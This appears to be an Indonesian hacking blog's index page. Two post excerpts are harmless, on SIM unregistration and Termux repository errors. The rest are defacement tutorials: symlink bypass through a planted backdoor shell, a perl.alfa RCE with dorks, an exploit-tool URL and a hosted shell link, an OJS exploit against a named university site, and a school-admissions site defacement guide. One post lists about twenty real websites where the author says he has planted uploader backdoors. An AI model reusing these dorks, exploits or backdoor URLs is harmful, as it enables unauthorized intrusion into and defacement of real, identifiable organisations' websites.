Postingan

Cara Unreg Atau Menonaktifkan Nomor All Operator

Gambar
  Sejak 2017 lalu , Kementerian Komunikasi dan Informatika (Kominfo) telah memutuskan bahwa semua nomor kartu prabayar dari berbagai operator terlebih dahulu harus melalui tahapan registrasi menggunakan Nomor Induk Kependudukan (NIK). Hal ini berguna agar mencegah penyalahgunaan nomor pelanggan terutama pelanggan prabayar. Registrasi ini juga berfungsi sebagai upaya perlindungan konsumen dari berbagai penipuan maupun tindak kejahatan lainnya. Lantas bagaimana jika kartu prabayar sudah tidak digunakan lagi? Bagi sebagian orang tentu akan langsung membuang atau menyimpannya begitu saja. Namun perlu menjadi perhatian, sebelum membuang kartu SIM, pengguna sebaiknya perlu menghapus data pribadi yang telah terdaftar dengan cara unreg kartu SIM atau menon-aktifkannya. Lantas bagaimana cara unreg kartu Axis lewat SMS? Berikut ini Blogspot Mr. Quixter bagikan cara unreg kartu Axis lewat SMS 1. Cara unreg kartu Axis lewat SMS Buka menu “Pesan” di ponsel Anda Ketik UNREG (tanda p

Cara mengatasi error 403 forbidden dan 503 bad gateway pada termux terbaru 2022 "repository is under maintence or down (wrong sources"

Gambar
  Assalamualaikum wr.wb Pada kesempatan kali ini,  Saya akan membagikan tutorial cara mengatasi error pada termux ketika kita menginstall package. Kalian pasti bingung saat menemukan masalah seperti gambar di atas pada tahap penginstalan paket. Sudah hapus aplikasi, download lagi, tetapi hasilnya tetap saja. Sangat kesal sekali bukan?. Kali ini admin akan membagikan cara untuk mengatasi termux yang error dan muncul tulisan  "repository is under maintence or down (wrong sources.list URL?)." Atau muncul tulisan forbidden403 dan 503 Bad Gateway. Note: Cara yang admin bagikan ini, 95% berhasil ya. Jadi, silahkan tinggalkan komentar kalian, apakah kalian berhasil atau tidak. Untuk mengatasi masalah di atas, yang perlu kalian lakukan adalah; 1. Menghapus aplikasi termux 2. Setelah aplikasi termux terhapus, silahkan kalian download aplikasi termux yang baru  Disini 3. Setelah kalian download, silahkan install aplikasinya seperti biasa. 4.. jika tahap instalasi aplikasi telah selesa

Tutorial Symlink Dan Bypass Symlink 404 dan 403

Gambar
Assalamualaikum wr.wb Pada kesempatan kali ini, saya akan membagikan tutorial yang cukup panjang. Sehingga pemula seperti saya, biasanya susah untuk memahaminya.  Tapi saya telah menyediakan contoh berupa gambar pada setiap langkahnya agar memudahkan kita untuk belajar. Untuk tutorial yang saya bagikan adalah tutorial atau cara Symlink Get Config &   Bypass Symlink 404, 403, Atau File Config Blank Saat Di Akses. Apa itu symlink? Perlu di ketahui, Symlink yang merupakan   singkatan dari Symbolic Link adalah sebuah file atau folder khusus yang mengacu ke file atau folder lainnya yang berada dalam satu server / sistem. Ok langsung saja kita lanjut ke tutorial symlink get config dan bypass symlink 403, 404, atau file config blank. PERSIAPAN: Pertama, silahkan siapkan beberapa bahan berikut; 1. Shell backdoor yang sudah tertanam dan memiliki fitur symlink. Disini saya memakai alfa shell.  2. File bypass symlink. File 1  Bypass symlink 1 File 2  Bypass symlink 2 3. Cewe biar semangat, ka

Tutorial Deface Poc Alfa RCE perl.alfa

Gambar
  Assalamualaikum wr.wb Kembali lagi bersama saya yang ganteng ini. Kali ini saya akan membagikan Tutorial Deface Poc RCE perl.alfa Upload Shell .  Ok tanpa bersendau gurau di awal langsung saja kita siapkan bahannya. Untuk bahan yang perlu kalian siapkan adalah: 1. Dork  2. Tools Exploit nya, disini gw make tools dari exploit.my.id Untuk tools nya buka aja ini url nya: http://v1.exploits.my.id:1337/?tools=perlalfa   3. Shell dalam bentuk txt yg di taruh di github / pastebin. Disini saya akan memakai dari github. Link shell yang saya pakai: https://raw.githubusercontent.com/mrquixter/quixter-ohct/main/qxtrbyp.php Untuk dork, kalian bisa gunakan: /alfacgiapi/perl.alfa "2020" /alfacgiapi/perl.alfa "2021" /alfacgiapi/perl.alfa "28" /alfacgiapi/perl.alfa "1" Kembangin sendiri ga usah manja! Jika semua bahan sudah siap dan kalian sudah menemukan targetnya, mari kita eksekusi. Pertama silahkan buka website target dan lihat web nya vuln atau tidak. Perh

Bagi bagi uploader untuk mirror

Gambar
Assalamualaikum wr.wb Ok, pada kesempatan kali ini saya akan membagikan Uploader  yang sudah saya tanam di beberapa website. Uploder ini bisa kalian gunakan  mirror, pansos, dan soof ke cewe kalian biar keliatan heker banget :v Ok tanpa berlama lama langsung saja ini uploadernya: https://webexpertbd.com/qxtr.php https://jessekimotho.com/qxtr.php https://globalinternationalschool.org.in/qxtr.php https://bgmachine.in/qxtr.php https://ukjala.com/qxtr.php https://aaween.com/qxtr.php https://aswaada.com/qxtr.php https://careerjobads.com/qxtr.php https://drugindex.it/qxtr.php https://emiratesaldubai.com/qxtr.php http://empirecentre.pk/qxtr.php http://hamidchughtai.com/qxtr.php https://onlineislamiccourses.com/qxtr.php https://starwelfare.org/qxtr.php http://swotv.pk/qxtr.php http://thequranreading.com/qxtr.php http://theharvardschools.com/qxtr.php https://emovie.cf/lib/img/qxtr.php https://horinam.com/pro/qxtr.php https://online-market.in/test/wp-admin/qxtr.php https://myjobstudio.xyz/qxtr.p

Tutorial Deface Poc Open Journal System (OJS)

Gambar
Assalamualaikum wr.wb Kembali lagi bersama gwa Mr. Quixter yang sangat ganteng. Kali ini saya akan membagikan tutorial Deface poc OJS  (Open  Journal  System) Bahan pertama yg perlu disiapkan adalah; 1. Hp/Laptop 2. Koneksi internet 3. Dork 4. Exploit 5. Shell dengan ext .phtml / Sc Deface ext .html 6. Kesabaran 7. Cewe biar tambah semangat. Tapi kalo lu wibu ga usah!! Ihhh wibuuuu Ok. Jika semua bahan sudah siap langsung kita gaskeun!!. Pertama, silahkan kalian buka search engine kebanggaan kalian. Disini gwa make chrome. 2. Silahkan lakukan dorking pada search engine kalian. Dork:  "Open Journal System" site:.. inurl:jour site:... Kembangin sendiri blog jangan manja. Nah tuh orang ganteng dapet target; http://www.univagora.ro/jour/index.php/index/index Nah, kalo dah dapet targetnya, silahkan kalian masukkan exploitnya. Yaitu dengan menambahkan: /files Di depan index.php Jadinya gini: http://www.univagora.ro/jour/files Nah, kalau misalkan web itu vuln, maka akan muncul tampi

Cara Deface Website PPDB / PSB 2021/2022

Gambar
 Uhuk uhuk test test... Hmm. Bismillahhirrohmannirrohim . Assalamualaikum wr.wb Kali ini saya yg ganteng ini akan membagikan materi mengenai cara deface website PPDB sekolah. Seperti yg kita tahu, saat ini sebagian ppdb / psb telah di buka di beberapa sekolah. Dan saya rasa ini cocok untuk di cubit webnya :v Ok, hal pertama yg harus kalian siapkan adalah; 1. Dork Untuk dork yg biasa saya gunakan adalah: inurl:ppdb "daftar" inurl:ppdb "password" inurl:psb "registrasi" Note: Kembangkan lagi biar dapet yg masih perawan. 2. Shell backdoor 3. Script deface 4. Iman dan taqwa v: Ok, jika semua sudah siap. Langsung saja ke cara nya. 1 . Silahkan kalian melakukan dorking pada search engine kesayangan kalian. Seperti, google, bing, yahoo dll. 2 . Silahkan kalian pilih salah satu websitenya. Kemudian silahkan melakukan registrasi. 3 . Jika registrasi berhasil, maka biasanya kalian akan di berikan username & password dari website tersebut ataupun melalui email. 

Postingan populer dari blog ini

Tutorial Deface Poc Open Journal System (OJS)

Cara Unreg Atau Menonaktifkan Nomor All Operator

Tutorial Deface Poc Alfa RCE perl.alfa